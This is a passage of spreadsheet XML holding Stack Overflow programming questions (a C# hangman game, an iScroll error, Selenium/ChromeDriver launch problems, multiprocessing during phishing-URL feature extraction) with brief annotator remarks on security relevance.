 &lt;pre&gt;&lt;code&gt; private void makeLabels()
  {
  w = getRandomWord().ToLower();
  w.Replace(" ", "");
  char[] letters = w.ToCharArray();
  int space = 569 / letters.Length - 1;
  for (int i = 0; i &amp;lt; letters.Length; i++)
  {
  labels.Add(new Label());
  labels[i].Location = new Point((i * space) + 10, 109);
  labels[i].Parent = groupBox2;
  labels[i].Text = "_" + i;
  labels[i].BringToFront();
  labels[i].CreateControl();
  }
  lblLength.Text = letters.Length.ToString();
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is a method to create a new game when 1) the user guesses the word completely or 2) the user runs out of guesses.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void newGame()
  {
  gameCount++;
  if (gameCount == 15)
  {
  this.Hide();
  if (score &amp;gt;= 7)
  {
  Form4 f4 = new Form4();
  f4.ShowDialog();
  }
  else
  {
  Form6 f6 = new Form6();
  f6.ShowDialog();
  }
  }
  else
  {
  getRandomWord();
  makeLabels();
  enableLetterButtons();
  lblMissed.Text = "";
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part0;
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below gets a random word from the string array to be used as the mystery word in the game.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; public string getRandomWord()
  {
  Random randomNum = new Random();
  String[] words = {"virus", "network", "syntax", "router", "switch", "worms", "trojan", "email", "bios",
  "cmos", "ram", "cipher", "malware", "botnet", "cookies", "patches", "cryptograph",
  "metamorphic", "polymorphic", "rootkit", "logicbomb", "spam", "spyware", "keyloggers",
  "adware", "software", "hardware", "botherder", "phishing", "whaling", "pharming", 
  "vishing", "spim", "topology", "tailgating", "loop", "java", "motherboard", "unique",
  "parameter"};
  int randomNumber = randomNum.Next(0, (words.Length - 1));
  return words[randomNumber];
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to change the picture every time the user guesses wrongly.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void setPicture(int wrongTry)
  {
  switch(wrongTry)
  {
  case 0: 
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part0;
  break;
  case 1: 
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part1;
  break;
  case 2:
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part2;
  break;
  case 3:
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part3;
  break;
  case 4:
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part4;
  break;
  case 5:
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part5;
  break;
  case 6:
  hangPic.Image = Hangman_APPD_Assignment.Properties.Resources.part6;
  break;
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to call a method when the user clicks one of the alphabet buttons.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void checkGuessedLetter(string wordToGuess, string guessedLetter, Button buttonName)
  {
  int strLength = wordToGuess.Length;
  char letter = guessedLetter.ToCharArray()[0];
  buttonName.Enabled = false;
  if (w.Contains(guessedLetter))
  {
  char[] LS = w.ToCharArray();
  for (int i = 0; i &amp;lt; LS.Length; i++)
  {
  if (LS[i] == letter)
  {
  MessageBox.Show("The value of w is " + w + " AND " + i);
  labels[i].Text = letter.ToString();
  conditionPic.Image = Hangman_APPD_Assignment.Properties.Resources.correctpic;
  correctCount++;
  MessageBox.Show("You got correct " + correctCount + " time(s).");
  if (correctCount == strLength)
  {
  MessageBox.Show("Good job! Keep it up, matey!", "Victory!", MessageBoxButtons.OK, MessageBoxIcon.None);
  score++;
  lblScore.Text = score.ToString();
  newGame();
  missed = 0;
  correctCount = 0;
  labels.Clear();
  }
  }
  foreach (Label l in labels)
  if (l.Text == "__") return;
  }
  }
  else
  {
  conditionPic.Image = Hangman_APPD_Assignment.Properties.Resources.wrong;
  lblMissed.Text += " " + letter.ToString() + " |";
  missed++;
  MessageBox.Show("You missed " + missed + " time(s).");
  setPicture(missed);
  if (missed == 6)
  {
  MessageBox.Show("Unfortunately, you lost this round... Make sure you won't let this happen again, "
  + "or else you will end up in Davy Jones' Locker.", "Defeat!", MessageBoxButtons.OK, 
  MessageBoxIcon.Error);
  newGame();
  missed = 0;
  correctCount = 0;
  labels.Clear();
  }
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to get the score that is accumulated at the lblScore label to be shown in the next form.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; public int getScore()
  {
  int score = int.Parse(lblScore.Text);
  return score;
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The codes below is to call a method when the user clicks a button that contains an alphabet to guess the word in the Hangman game.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void Abtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "a", Abtn);
  }
  private void Bbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "b", Bbtn);
  }
  private void Cbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "c", Cbtn);
  }
  private void Dbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "d", Dbtn);
  }
  private void Ebtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "e", Ebtn);
  }
  private void Fbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "f", Fbtn);
  }
  private void Gbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "g", Gbtn);
  }
  private void Hbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "h", Hbtn);
  }
  private void Ibtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "i", Ibtn);
  }
  private void Jbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "j", Jbtn);
  }
  private void Kbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "k", Kbtn);
  }
  private void Lbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "l", Lbtn);
  }
  private void Mbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "m", Mbtn);
  }
  private void Nbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "n", Nbtn);
  }
  private void Obtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "o", Obtn);
  }
  private void Pbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "p", Pbtn);
  }
  private void Qbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "q", Qbtn);
  }
  private void Rbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "r", Rbtn);
  }
  private void Sbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "s", Sbtn);
  }
  private void Tbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "t", Tbtn);
  }
  private void Ubtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "u", Ubtn);
  }
  private void Vbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "v", Vbtn);
  }
  private void Wbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "w", Wbtn);
  }
  private void Xbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "x", Xbtn);
  }
  private void Ybtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "y", Ybtn);
  }
  private void Zbtn_Click(object sender, EventArgs e)
  {
  checkGuessedLetter(w, "z", Zbtn);
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to enable back all the buttons that has been clicked on the previous game.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void enableLetterButtons()
  {
  Abtn.Enabled = true;
  Bbtn.Enabled = true;
  Cbtn.Enabled = true;
  Dbtn.Enabled = true;
  Ebtn.Enabled = true;
  Fbtn.Enabled = true;
  Gbtn.Enabled = true;
  Hbtn.Enabled = true;
  Ibtn.Enabled = true;
  Jbtn.Enabled = true;
  Kbtn.Enabled = true;
  Lbtn.Enabled = true;
  Mbtn.Enabled = true;
  Nbtn.Enabled = true;
  Obtn.Enabled = true;
  Pbtn.Enabled = true;
  Qbtn.Enabled = true;
  Rbtn.Enabled = true;
  Sbtn.Enabled = true;
  Tbtn.Enabled = true;
  Ubtn.Enabled = true;
  Vbtn.Enabled = true;
  Wbtn.Enabled = true;
  Xbtn.Enabled = true;
  Ybtn.Enabled = true;
  Zbtn.Enabled = true;
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to close the application when the user clicked the X button on the top right-hand corner of the application.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void btnOut_Click(object sender, EventArgs e)
  {
  Application.Exit();
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;}&lt;/p&gt;
 &lt;p&gt;P.S. I'm sorry I forgot to put in where the error comes from.
 So the error is at the &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;labels[i].Text = letter.ToString();
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;in the checkGuessedLetter(string wordToGuess, string guessedLetter, Button buttonName) method.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;</t>
  </si>
  <si>
    <t>Exclude? talking about glyphish icones</t>
  </si>
  <si>
    <t>Refrence error for iscrollview and iscroll js</t>
  </si>
  <si>
    <t>&lt;p&gt;Hi i am a newbie in javascript and jquery i am building a phonegap application .&lt;/p&gt;
 &lt;p&gt;In my application i am trying to implement the pull to refresh feature using the iscroll and iscrollview as demoed in the site &lt;a href="http://www.x-services.nl/category/phonegap-cordova" rel="nofollow"&gt;http://www.x-services.nl/category/phonegap-cordova&lt;/a&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
 &amp;lt;meta name="viewport" content="width=device-width, initial-scale=1"&amp;gt;
 &amp;lt;title&amp;gt;Event Info&amp;lt;/title&amp;gt;
 &amp;lt;style&amp;gt;
 .ui-page {
  -webkit-backface-visibility: hidden;
  } 
 #navgroup {text-align:center;}
 #navgroup div {display:inline-block;}
  .nav-glyphish-example .ui-btn .ui-btn-inner { padding-top: 40px !important; }
  .nav-glyphish-example .ui-btn .ui-icon { width: 30px!important; height: 30px!important; margin-left: -15px !important; box-shadow: none!important; -moz-box-shadow: none!important; -webkit-box-shadow: none!important; -webkit-border-radius: none !important; border-radius: none !important; }
  #chat .ui-icon { background: url(images/icons/09-chat-2.png) 50% 50% no-repeat; background-size: 24px 22px; }
  #email .ui-icon { background: url(images/icons/18-envelope.png) 50% 50% no-repeat; background-size: 24px 16px; }
  #login .ui-icon { background: url(images/icons/30-key.png) 50% 50% no-repeat; background-size: 12px 26px; }
  #beer .ui-icon { background: url(images/icons/88-beermug.png) 50% 50% no-repeat; background-size: 22px 27px; }
  #coffee .ui-icon { background: url(images/icons/100-coffee.png) 50% 50% no-repeat; background-size: 20px 24px; }
  #skull .ui-icon { background: url(images/icons/21-skull.png) 50% 50% no-repeat; background-size: 22px 24px; }
 &amp;lt;/style&amp;gt;
 &amp;lt;link rel="stylesheet" type="text/css" href="http://code.jquery.com/mobile/1.3.1/jquery.mobile-1.3.1.min.css"&amp;gt;
 &amp;lt;link rel="stylesheet" type="text/css" href="css/mobiscroll.custom-2.5.4.min.css"&amp;gt;
 &amp;lt;link rel="stylesheet" type="text/css" href="css/jqm-icon-pack-fa.css"&amp;gt;
 &amp;lt;link rel="stylesheet" type="text/css" href="css/jquery.mobile.iscrollview.css"&amp;gt;
 &amp;lt;link rel="stylesheet" type="text/css" href="css/jquery.mobile.iscrollview-pull.css"&amp;gt;
 &amp;lt;script type="text/javascript" src="http://code.jquery.com/jquery-1.8.2.min.js"&amp;gt;&amp;lt;/script&amp;gt; 
 &amp;lt;script type="text/javascript" src="http://code.jquery.com/mobile/1.3.1/jquery.mobile-1.3.1.min.js" &amp;gt; &amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript" src="scripts/mobiscroll.custom-2.5.4.min.js" &amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript" src="scripts/iscroll.js" &amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript" src="scripts/jquery.mobile.iscrollview.js" &amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript" src="scripts/indexinfo.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;!-- script type="text/javascript" src="scripts/date.js"&amp;gt;&amp;lt;/script&amp;gt; --&amp;gt;
 &amp;lt;script src="phonegap.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;script type="text/javascript"&amp;gt;
 &amp;lt;/script&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body id="body"&amp;gt;
 &amp;lt;div id="plistview" data-role="page" &amp;gt;
  &amp;lt;script src="scripts/date.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;div data-role="header" data-position="fixed" data-tap-toggle="false" id="header" data-theme="a"&amp;gt;
  &amp;lt;!-- &amp;lt;a id="calendarlink" href="calendarview.html" data-icon="" class="ui-btn-left" data-ajax="false"&amp;gt;Calendar&amp;lt;/a&amp;gt; 
  &amp;lt;a id="calendarlink" data-role="button" href="#" data-icon="calendar" class="ui-btn-right" data-transition="slideup" data-prefetch="true"&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;a id="filterlink" data-role="button" href="#pfilterview" data-icon="filter" class="ui-btn-right" data-transition="slideup" data-prefetch="true"&amp;gt;&amp;lt;/a&amp;gt; 
  --&amp;gt;
  &amp;lt;div class="ui-btn-right"&amp;gt;
  &amp;lt;a id="calendarlink" href="calendarview.html" data-role="button" data-icon="calendar" data-iconpos="notext" data-theme="c" data-inline="true" data-transition="slide"&amp;gt;Calendar&amp;lt;/a&amp;gt;
  &amp;lt;a href="#" data-role="button" data-icon="list" class="ui-btn-active" data-iconpos="notext" data-theme="c" data-inline="true"&amp;gt;list&amp;lt;/a&amp;gt; 
  &amp;lt;a href="#pfilterview" data-role="button" data-icon="filter" data-iconpos="notext" data-theme="c" data-transition="slideup" data-inline="true"&amp;gt;filter&amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;h1&amp;gt;Event Info&amp;lt;/h1&amp;gt; 
 &amp;lt;/div&amp;gt;
  &amp;lt;p id="paragraph"&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;div id="middlecontent" data-role="content" data-iscroll&amp;gt; 
  &amp;lt;div class="iscroll-pulldown"&amp;gt;
  &amp;lt;span class="iscroll-pull-icon"&amp;gt;&amp;lt;/span&amp;gt;
  &amp;lt;span class="iscroll-pull-label"
  data-iscroll-loading-text="News is being refreshed"
  data-iscroll-pulled-text="Release to refresh the news"&amp;gt;
  Refresh the news
  &amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id="eventlist"&amp;gt; 
  &amp;lt;!-- &amp;lt;a id="getpreviouseventsbutton" href="#" data-role="button" data-mini="true" &amp;gt;Get previous events&amp;lt;/a&amp;gt; --&amp;gt;
  &amp;lt;br&amp;gt; 
  &amp;lt;ul id="upcomingevents" data-role="listview" data-inset="true"&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;one&amp;lt;/li&amp;gt; 
  &amp;lt;/ul&amp;gt;
  &amp;lt;br&amp;gt; 
  &amp;lt;!-- &amp;lt;a id="getmoreeventsbutton" href="#" data-role="button" data-mini="true" &amp;gt;Get next month events&amp;lt;/a&amp;gt; --&amp;gt; 
  &amp;lt;/div&amp;gt;
 &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;div data-role="footer" id="footer" data-position="fixed" data-tap-toggle="false"&amp;gt;
  &amp;lt;div data-role="navbar"&amp;gt; 
  &amp;lt;div id="navgroup" data-role="controlgroup" data-type="horizontal" data-mini="true"&amp;gt;
  &amp;lt;a id="listlink" href="#" data-role="button" data-icon="" class="ui-btn-active ui-state-persist" &amp;gt;List&amp;lt;/a&amp;gt;
  &amp;lt;a id="calendarlink" href="calendarview.html" data-role="button" data-icon="" data-transition="slide"&amp;gt;Month&amp;lt;/a&amp;gt; 
  &amp;lt;/div&amp;gt;
  &amp;lt;!-- &amp;lt;div data-role="controlgroup" data-type="horizontal"&amp;gt; 
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="listlink" href="#" data-role="button" data-icon="" class="ui-btn-active ui-state-persist" &amp;gt;List&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="calendarlink" href="calendarview.html" data-role="button" data-icon="" class="ui-btn-center" data-transition="slide"&amp;gt;Calendar&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;/ul&amp;gt;
  --&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;div id="pfilterview" data-role="page" &amp;gt;
 &amp;lt;script type="text/javascript"&amp;gt;
 $(document).one("pageshow",'#pfilterview',function(){
  console.log("category list is loading");
  $.ajax({
  beforeSend: function() { $.mobile.showPageLoadingMsg(); }, //Show spinner
  complete: function() { $.mobile.hidePageLoadingMsg() }, //Hide spinner
  url: 'http://linuxweb.symsoft.local/ycal/index.php/event/Categories?callback=test',
  dataType: 'jsonp',
  success: function( arr ) { 
  for(var i=0;i&amp;lt;arr.length;i++){
  $('#categories').append( '&amp;lt;label&amp;gt;&amp;lt;input class="selectedcategory" value="'+arr[i].category+'" name="'+arr[i].category+'" type="checkbox"&amp;gt;'+arr[i].category+'&amp;lt;/label&amp;gt;').trigger( "create" ); 
  }// this logic assumes that the data is in ascending order by date 
  //code to fill the event list page ends 
  //$('#upcomingevents').listview('refresh');
  },
  error: function( data ) {
  console.log( "error" );
  alert( "ERROR: " + data );
  }
  }); 
 });
 $(document).on('click','#apply',function(e){
  e.preventDefault();
  filteredcategories=[];
  $('#categorylist :checked').each(function() {
  filteredcategories.push($(this).val());
  });
  console.log("filtered values -&amp;gt; "+filteredcategories); 
  updatelistview();
 });
 $(document).ready(function(){
  $('#selectbutton').toggle(function(){
  $('input:checkbox').prop('checked',true).checkboxradio("refresh");
  $(this).val('Deselect all').button('refresh');
  },function(){ 
  $('input:checkbox').prop('checked',false).checkboxradio("refresh");
  $(this).val('Select all').button('refresh'); 
  })
 });
 &amp;lt;/script&amp;gt;
  &amp;lt;div data-role="header" data-position="fixed" data-tap-toggle="flase"&amp;gt;
  &amp;lt;a href="#plistview" id="apply" ..data-icon="" class="ui-btn-left" data-transition="slidedown"&amp;gt;Cancel&amp;lt;/a&amp;gt;
  &amp;lt;a href="#" id="apply" data-icon="" class="ui-btn-right" data-transition="slidedown"&amp;gt;Apply&amp;lt;/a&amp;gt;
  &amp;lt;h1&amp;gt;Filter&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="content"&amp;gt; 
  &amp;lt;div id="categorylist"&amp;gt; 
  &amp;lt;form id="categories"&amp;gt;
  &amp;lt;input class="check" id="selectbutton" type='button' value="Select All"&amp;gt; 
  &amp;lt;/form&amp;gt;
  &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;a href="#plistview" id="apply" data-icon="" data-role="button" data-mini="true" data-transition="slidedown"&amp;gt;Apply&amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="footer" data-position="fixed" data-tap-toggle="flase"&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I get ReferenceError: iScroll is not defined
 jquery.mobile.iscrollview.js
 Line 259 which points to iscrollview.js i am unable to figure out the reason for this reference error.&lt;/p&gt;
 &lt;p&gt;The line is _subclass(IScroll,iScroll) the iScroll is undefined . Here iScroll var is a superconstructor type var 
 I fail to understand the reason for this cause &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;jquery&gt;&lt;iscroll&gt;&lt;iscrollview&gt;</t>
  </si>
  <si>
    <t>Exclude? he was trying to pass some paramters for phsihing disabaling</t>
  </si>
  <si>
    <t>Selenium doesn't pass agruments when opening chrome</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm using this code in order to "make" selenium-chrome to use my custom profile.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;options = webdriver.ChromeOptions()
 options.add_argument('--user-data-dir=C:\Users\imm\AppData\Local\Google\Chrome\User Data')
 options.add_argument('--profile-directory=Profile 1') 
 driver = webdriver.Chrome(executable_path=r"C:\Driver\chromedriver.exe", chrome_options=options)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But the opened chrome doesn't load the above profile, instead it's loading some temporary profile like below (which I get from chrome://version)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;C:\Users\imm\AppData\Local\Temp\scoped_dir7692_1866581775\Default
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And looking at the &lt;code&gt;Command line&lt;/code&gt; section, I can see that selenium didn't pass the above arguments into the command line. &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;"C:\Program Files\Google\Chrome\Application\chrome.exe"
  --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --force-fieldtrials --ignore-certificate-errors --load-extension="C:\Users\imm\AppData\Local\Temp\scoped_dir7692_281384323\internal"
  --log-level=0 --no-first-run --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain &lt;strong&gt;--user-data-dir="C:\Users\imm\AppData\Local\Temp\scoped_dir7692_1866581775"&lt;/strong&gt;
  --flag-switches-begin --flag-switches-end data:,&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Can someone tell me what I'm doing wrong? Thanks!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;selenium&gt;&lt;arguments&gt;</t>
  </si>
  <si>
    <t>Phishing research and datasets</t>
  </si>
  <si>
    <t>BrokenPipeError: [WinError 109] The pipe has been ended during data extraction</t>
  </si>
  <si>
    <t>&lt;p&gt;I am new to multiprocessing in python.I am extracting some features from a list of 70,000 URLs. I have them from 2 different files. After the feature extraction process I pass the result to a list and then to a CSV file.&lt;/p&gt;
 &lt;p&gt;The code runs but then stops with the error.I tried to catch the error but it produced another one.&lt;/p&gt;
 &lt;p&gt;Python version = 3.5&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;from feature_extractor import Feature_extraction
 import pandas as pd
 from pandas.core.frame import DataFrame
 import sys
 from multiprocessing.dummy import Pool as ThreadPool
 import threading as thread
 from multiprocessing import Process,Manager,Array
 import time
 class main():
 lst = None
 def __init__(self):
  manager = Manager()
  self.lst = manager.list()
  self.dostuff() 
  self.read_lst()
 def feature_extraction(self,url): 
  if self.lst is None:
  self.lst = []
  features = Feature_extraction(url) 
  self.lst.append(features.get_features())
  print(len(self.lst))
 def Pool(self,url): 
  pool = ThreadPool(8) 
  results = pool.map(self.feature_extraction, url)
 def dostuff(self):
  df = pd.read_csv('verified_online.csv',encoding='latin-1')
  df['label'] = df['phish_id'] * 0
  mal_urls = df['url']
  df2 = pd.read_csv('new.csv') 
  df2['label'] = df['phish_id']/df['phish_id']
  ben_urls = df2['urls']
  t = Process(target=self.Pool,args=(mal_urls,))
  t2 = Process(target=self.Pool,args=(ben_urls,))
  t.start()
  t2.start()
  t.join()
  t2.join 
 def read_lst(self):
  nw_df = DataFrame(list(self.lst))
  nw_df.columns = ['Redirect count','ssl_classification','url_length','hostname_length','subdomain_count','at_sign_in_url','exe_extension_in_request_url','exe_extension_in_landing_url',
  'ip_as_domain_name','no_of_slashes_in requst_url','no_of_slashes_in_landing_url','no_of_dots_in_request_url','no_of_dots_in_landing_url','tld_value','age_of_domain',
  'age_of_last_modified','content_length','same_landing_and_request_ip','same_landing_and_request_url']
  frames = [df['label'],df2['label']]
  new_df = pd.concat(frames)
  new_df = new_df.reset_index()
  nw_df['label'] = new_df['label']
  nw_df.to_csv('dataset.csv', sep=',', encoding='latin-1')
  if __name__ == '__main__':
 start_time = time.clock()
 try:
  main()
 except BrokenPipeError:
  print("broken pipe....")
  pass
 print (time.clock() - start_time, "seconds") 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Error Traceback&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Process Process-3:
 Traceback (most recent call last):
  File "F:\Continuum\Anaconda3\lib\multiprocessing\connection.py", line 312, in _recv_bytes
  nread, err = ov.GetOverlappedResult(True)
 BrokenPipeError: [WinError 109] The pipe has been ended
 During handling of the above exception, another exception occurred:
 Traceback (most recent call last):
  File "F:\Continuum\Anaconda3\lib\multiprocessing\process.py", line 249, in _bootstrap
  self.run()
  File "F:\Continuum\Anaconda3\lib\multiprocessing\process.py", line 93, in run
  self._target(*self._args, **self._kwargs)
  File "H:\Projects\newoproject\src\main.py", line 33, in Pool
  results = pool.map(self.feature_extraction, url)
  File "F:\Continuum\Anaconda3\lib\multiprocessing\pool.py", line 260, in map
  return self._map_async(func, iterable, mapstar, chunksize).get()
  File "F:\Continuum\Anaconda3\lib\multiprocessing\pool.py", line 608, in get
  raise self._value
  File "F:\Continuum\Anaconda3\lib\multiprocessing\pool.py", line 119, in worker
  result = (True, func(*args, **kwds))
  File "F:\Continuum\Anaconda3\lib\multiprocessing\pool.py", line 44, in mapstar
  return list(map(*args))
  File "H:\Projects\newoproject\src\main.py", line 26, in feature_extraction
  self.lst.append(features.get_features())
  File "&amp;lt;string&amp;gt;", line 2, in append
  File "F:\Continuum\Anaconda3\lib\multiprocessing\managers.py", line 717, in _callmethod
  kind, result = conn.recv()
  File "F:\Continuum\Anaconda3\lib\multiprocessing\connection.py", line 250, in recv
  buf = self._recv_bytes()
  File "F:\Continuum\Anaconda3\lib\multiprocessing\connection.py", line 321, in _recv_bytes
  raise EOFError
 EOFError
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;multiprocessing&gt;&lt;python-multiprocessing&gt;&lt;feature-extraction&gt;</t>
  </si>
  <si>
    <t>Exclude? Passing phishing as paramters irrelavanet</t>
  </si>
  <si>
    <t>"Chrome failed to start: exited abnormally"</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to run a simple selenium case on Ubuntu 16.4 to check my updated ChromeDriver version. Here is my settings information: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;OS: Ubuntu 16.04
 Chromium: 69.0.3497.81, Built on Ubuntu , 
 Chromedriver: v2.8.240825
 jdk: openjdk version "1.8.0_181"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And here is my simple java code: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public static void main(String[] args) throws IOException, InterruptedException {
  System.setProperty("webdriver.chrome.driver", "/usr/bin/chromedriver");
  System.setProperty("webdriver.chrome.logfile", "/tmp/chromedriver.log");
  System.setProperty("webdriver.chrome.verboseLogging", "true");
  ChromeOptions chromeOptions = new ChromeOptions();
  chromeOptions.addArguments("--headless", "window-size=1024,768", "--no-sandbox");
  WebDriver driver = new ChromeDriver(chromeOptions);
  driver.get("https://google.com");
  System.out.println("Title is " + driver.getTitle());
  if (driver.getPageSource().contains("I'm Feeling Lucky")) {
  System.out.println("Pass");
  } else {
  System.out.println("Fail");
  }
  driver.quit();
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But during the runtime, I'm keep getting &lt;strong&gt;"Chrome failed to start: exited abnormally"&lt;/strong&gt;, with such in the log file: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; "
 ....
  [0.317][INFO]: Launching chrome: /usr/bin/chromium-browser --disable-background-networking --disable-client-side-phishing-detection --disable-component-update --disable-default-apps --disable-hang-monitor --disable-prompt-on-repost --dis
  able-web-resources --enable-logging --full-memory-crash-report --ignore-certificate-errors --load-extension=/tmp/.org.chromium.Chromium.GO6lAd/internal --logging-level=1 --metrics-recording-only --no-first-run --password-store=basic --re
  mote-debugging-port=12811 --safebrowsing-disable-auto-update --safebrowsing-disable-download-protection --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.uTbJHO data:,
  [0.317][DEBUG]: DevTools request: http://127.0.0.1:12811/json/version
  [0.319][WARNING]: PAC support disabled because there is no system implementation
  [0.390][DEBUG]: DevTools request failed
  [0.440][DEBUG]: DevTools request: http://127.0.0.1:12811/json/version
  [0.441][DEBUG]: DevTools request failed
  "
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But if I was to downgradethe the ChromeDriver to version 2.4, same code runs perfectly. Does anyone know why ? The reason why I need the latest one, is because there is some other feature I need to use. &lt;/p&gt;</t>
  </si>
  <si>
